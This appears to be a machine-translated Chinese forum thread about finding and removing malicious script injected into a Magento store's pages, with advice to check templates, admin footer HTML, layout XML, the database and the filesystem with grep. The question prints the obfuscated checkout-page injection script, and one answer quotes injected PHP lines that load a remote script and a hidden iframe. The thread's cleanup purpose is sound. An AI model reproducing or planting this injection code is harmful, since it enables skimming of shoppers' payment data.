我有一個惡意腳本被插入身體標記之後,我不知道要刪除它的文件,我已經檢查了管理員以及模板文件中的任何地方,它不在哪裏被發現。該病毒看起來是這樣的:如何刪除Magento中body標籤之後插入的腳本?
if((new
RegExp('onepage|checkout|onestep|firecheckout')).test(window.location))
{document.write('>tpircs/<>"sj.tekramroced/crs/knil.sj-
knil//:sptth"=crs tpircs<'.split("").reverse().join(""))};
請嘗試以下方法
我會推薦以下方法爲在Magento除去第三方腳本:
>接近1請去你的主題app/design/frontend/Yourtheme/default/template/page/,open在清除緩存並檢查您的商店後,查看文件並查找此代碼和評論。
<?php echo $this->getAbsoluteFooter() ?>
1column.phtml
2columns-left.phtml
2columns-right.phtml
3columns.phtml
所有其他代碼來getAbsoluteFooter下()函數,
>方法2: GO管理面板一般>設計>尾>其他HTML
>方法3:轉到local.xml中/ page.xml文件,並檢查這下面的代碼,可能是在同一文件中加入這樣的
<block type="core/text_list" name="after_body_start" as="after_body_start" translate="label">
<label>Page Top</label>
希望這對你有幫助。
只要知道腳本的名稱是什麼,就很容易擺脫這些惡意腳本。
我有很多這些腳本注入我的網站,其中大多數是腳本和iframe指向域http://siteverification.online。
我不是一個Magento的專家,但我想,那麼只能來自兩個地方:
對於數據庫,我使用MySQL,並且因爲我安裝了PhpMyAdmin,所以我利用它的Search函數,該函數可以搜索數據庫所有表的所有字段。我剛剛搜索了siteverification.online,發現了一些條目,並將其刪除。
對於文件系統,我登錄通過SSH,只是搜索整個網站的Magento文件系統,就像這樣:
$ grep -r "siteverification.online" /var/www/magento-project
./index.php:print('<script type="text/javascript" src="http://siteverification.online/lib/status.js"></script>');
./index.php:print('<iframe src="http://siteverification.online/" frameborder="0" width="0" height="0"></iframe>');
對我來說,事實證明,一些PHP代碼在index.php注入。但是如果代碼被注入到任何其他的php或html文件中,這將會發現它們,因爲搜索是遞歸的(-r標誌)。
就是這樣。我甚至都不瞭解Magento的文件系統和數據庫結構,但是使用這些激進的搜索方法,我在幾分鐘內擺脫了所有的惡意軟件。
你是否在其他代碼中檢查過它?在管理面板中? –
雜項HTML位於'system-> configuration-> design-> footer-> Miscellaneous'下的雜項HTML'檢查這可能是'code/virus' located there –